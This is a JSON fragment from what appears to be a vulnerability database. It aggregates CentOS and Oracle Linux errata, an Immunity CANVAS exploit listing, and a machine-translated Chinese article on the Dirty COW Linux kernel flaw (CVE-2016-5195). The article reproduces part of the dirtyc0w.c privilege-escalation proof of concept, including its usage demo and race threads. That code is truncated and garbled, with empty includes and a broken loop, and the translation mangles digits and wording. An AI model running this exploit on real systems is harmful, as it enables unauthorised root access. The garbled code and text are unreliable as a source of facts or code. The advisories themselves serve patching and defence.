"title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:26:00", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2016:2105\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-October/034172.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-firmware\nkernel-headers\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-2105.html", "modified": "2016-10-26T07:33:13", "published": "2016-10-26T07:33:13", "href": "http://lists.centos.org/pipermail/centos-announce/2016-October/034172.html", "id": "CESA-2016:2105", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:12", "bulletinFamily": "unix", "description": "- [3.10.0-327.36.3.OL7]\n- Oracle Linux certificates (Alexey Petrenko)\n[3.10.0-327.36.3]\n- [mm] remove gup_flags FOLL_WRITE games from __get_user_pages() (Alexander Gordeev) [1385123 1385124] {CVE-2016-5195}", "modified": "2016-10-24T00:00:00", "published": "2016-10-24T00:00:00", "id": "ELSA-2016-2098", "href": "http://linux.oracle.com/errata/ELSA-2016-2098.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:19", "bulletinFamily": "unix", "description": "[2.6.32-642.6.2]\n- [mm] close FOLL MAP_PRIVATE race (Larry Woodman) [1385116 1385117] {CVE-2016-5195}", "modified": "2016-10-25T00:00:00", "published": "2016-10-25T00:00:00", "id": "ELSA-2016-2105", "href": "http://linux.oracle.com/errata/ELSA-2016-2105.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2019-05-29T19:48:29", "bulletinFamily": "exploit", "description": "**Name**| linux_foll_write_cow \n---|--- \n**CVE**| CVE-2016-5195 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Linux Kernel FOLL_WRITE gup COW local privilege escalation \n**Notes**| Repeatability: Multiple Times \nNotes: \n \nTested on: \n\\- RedHat 7 \n\\- Ubuntu 14 \n\\- Ubuntu 16 \n \n \nVENDOR: Linux \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195 \nCVE Name: CVE-2016-5195 \n\n", "modified": "2016-11-10T21:59:00", "published": "2016-11-10T21:59:00", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/linux_foll_write_cow", "id": "LINUX_FOLL_WRITE_COW", "type": "canvas", "title": "Immunity Canvas: LINUX_FOLL_WRITE_COW", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2016-11-14T18:05:54", "bulletinFamily": "info", "description": "! [](/Article/UploadPic/2016-10/2 0 1 6 1 0 2 1 1 8 0 4 3 1 1. png? www. myhack58. com) \nVulnerability description \nVulnerability ID: CVE-2 0 1 6-5 1 9 5 \nVulnerability name: dirty cow\uff08Dirty COW\uff09 \nVulnerability to hazards: a low-rights user can use the vulnerability in the full version of the Linux system implemented on a local mention of the right to \nImpact scope: The Linux kernel&gt;=2.6.22 for 2 0 0 7 annual offerings beginning on the affected, until the 2 0 1 6 years 1 0 months 1 8 days to repair. \n3 6 0 Vulpecker Team: Android 7. 0 latest 1 0 On patch the security level of the system on test through vulnerability POC, confirm that the Android affected \nWhy is this vulnerability called dirty cattle\uff08Dirty COW\uff09vulnerability? \nThe Linux kernel's memory subsystem in a processing-on-write copies the Copy-on-Write)when the existence conditions of competitive vulnerability, the result can be destruction of private read-only memory mapping. A low-privileged local user can exploit this vulnerability to obtain additional read-only memory-mapped write permission, it is possible to lead to further mention the right vulnerability. \nVulnerability details \nVulnerability details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails \nAccording to the RedHat company reports: the current has been found in the wild for this vulnerability the use of technology. But so far, we have no further news. \nhttps://access.redhat.com/security/vulnerabilities/2706661 \nCommit messages: \ncommit 4ceb5db9757aaeadcf8fbbf97d76bd42aa4df0d6 \nAuthor: Linus Torvalds \nDate: Mon Aug 1 1 1:1 4:4 9 2 0 0 5 -0700 \nFix get_user_pages()with write access to the competitive conditions \nIf an update from the other end of the thread to modify the page table, the handle_mm_fault()will likely end the need for us to re-operation. handle_mm_fault()is no real protection has been able to destroy the COW on. This look is nice, but get_user_pages()after the end of the re-read, so that get_user_pages()has been rewritten, need dirty bit is set, the most simple solution to the competitive conditions of the approach is that if the COW break for some reason fails, we can continue the cycle to continue to try. \ncommit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 \nAuthor: Linus Torvalds \nDate: Thu Oct 1 3 2 0:0 7:3 6 2 0 1 6 GMT \nThis is an age-old BUG, I was in 7 years ago already tried to fix once before a commit 4ceb5db9757a, but due to some issues commit f33ea7f404e5 and roll back. This time, we pte_dirty()bit to do the testing. \nLinux is the release version for the vulnerability related information \nRed Hat: The https://access.redhat.com/security/cve/cve-2016-5195 \nDebian: the https://security-tracker.debian.org/tracker/CVE-2016-5195 \nUbuntu: the http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html \nThe affected area \nThis vulnerability since kernel 2. 6. 2 2 of 2 0 0 7 annual offerings beginning on the affected, until the 2 0 1 6 years 1 0 months 1 8 days to repair. \nHow to fix the vulnerability? \nThe Linux team is working actively to fix this vulnerability, update to the latest release fix this vulnerability. Software developers can also \nhttps://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/it? id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 \nRe-compile Linux to fix this vulnerability. \nHow to find someone using the exploit to attack me? \nThe use of this Bug is not in the log in the left exception information. But part of the security community has been to deploy a honeypot, if an attacker exploited this vulnerability, it will trigger the alarm. \nWho found this vulnerability? \nPhil Oester \uff08https://access.redhat.com/security/cve/CVE-2016-5195\uff09 \nFor the vulnerability the author even application Independent: the website, twitter account, github account, and looking for someone to design a Logo \nThe author of this explanation is: we build brands vulnerability is full of fun, but maybe at this point in time, this is not a good idea. But in order to show our position, I only create a website, online shop, twiiter account, as well as ask a professional designer for this vulnerability to design a LOGO. \n2016.10.21 1 3:3 7 update vulnerability scope: \n3 6 0 Vulpecker Team: Android 7. 0 latest 1 0 On patch the security level of the system on test through vulnerability POC, confirm that the Android affected \n! [](/Article/UploadPic/2016-10/2 0 1 6 1 0 2 1 1 8 0 4 1 2 4. png? www. myhack58. com) \n2016.10.21 9:1 0 update POC of: \nPOC address: \nhttps://github.com/dirtycow/dirtycow.github.io/blob/master/dirtyc0w.c \n/* \n####################### dirtyc0w. c####################### \n$ sudo-s \n# echo this is not a test &gt; foo \n# chmod 0 4 0 4 foo \n$ ls-lah foo \n-r-----r-- 1 root root 1 9 Oct 2 0 1 5:2 3 foo \n$ cat foo \nthis is not a test \n$ gcc-lpthread dirtyc0w. c-o dirtyc0w \n$ ./ dirtyc0w foo m00000000000000000 \nmmap 5 6 1 2 3 0 0 0 \nmadvise 0 \nprocselfmem 1 8 0 0 0 0 0 0 0 0 \n$ cat foo \nm00000000000000000 \n####################### dirtyc0w. c####################### \n*/ \n#include \n#include \n#include \n#include \n#include \n\nvoid *map; \nint f; \nstruct stat st; \nchar *name; \n\nvoid *madviseThread(void *arg) \n{ \nchar *str; \nstr=(char*)arg; \nint i,c=0; \nfor(i=0;i \n{ \n/* \nYou have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661 \n&gt; This is achieved by racing the madvise(MADV_DONTNEED) system call \n&gt; while having the page of the executable mmapped in memory. \n*/ \nc+=madvise(map,1 0 0,MADV_DONTNEED); \n} \nprintf(\"madvise %d\\n\\n\",c); \n} \n\nvoid *procselfmemThread(void *arg) \n{ \nchar *str; \nstr=(char*)arg; \n/* \nYou have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16 \n&gt; The in the wild exploit we are aware of doesn't work on Red Hat \n\n\n**[1] [[2]](<80403_2.htm>) [next](<80403_2.htm>)**\n", "modified": "2016-10-21T00:00:00", "published": "2016-10-21T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/80403.htm", "id": "MYHACK58:62201680403", "type": "myhack58", "title": "CVE-2 0 1 6-5 1 9 5 dirty cattle vulnerability: the Linux kernel through kill to mention the right vulnerability-vulnerability warning-the black bar safety net", "cvss": {"score": 0.0, "vector": "NONE"}}]}